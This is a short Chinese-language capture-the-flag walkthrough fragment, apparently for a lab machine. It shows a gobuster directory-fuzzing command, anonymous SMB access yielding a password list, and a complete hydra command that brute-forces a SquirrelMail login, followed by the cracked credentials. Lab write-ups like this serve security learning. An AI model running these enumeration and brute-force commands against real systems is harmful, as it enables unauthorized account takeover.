80端口应该是一个搜索页面 fuzz一下网站目录
gobuster dir -u <http://10.10.157.107:80/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
进入邮件系统登录目录下看看,这里好像没别的信息可拿,也爆破不出登录凭据
smb有个可以匿名访问的目录和
milesdyson
账户
进入该目录,下载txt文件,文件提示系统故障所有密码都被更改,进logs目录查看,在log1.txt得到一些字符串,尝试hydra爆破
hydra -l milesdyson -P log1.txt 10.10.157.107 -V http-form-post "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect."
得到登录凭据
milesdyson:cyborg007haloterminator
这里有一个有关密码重置的邮件
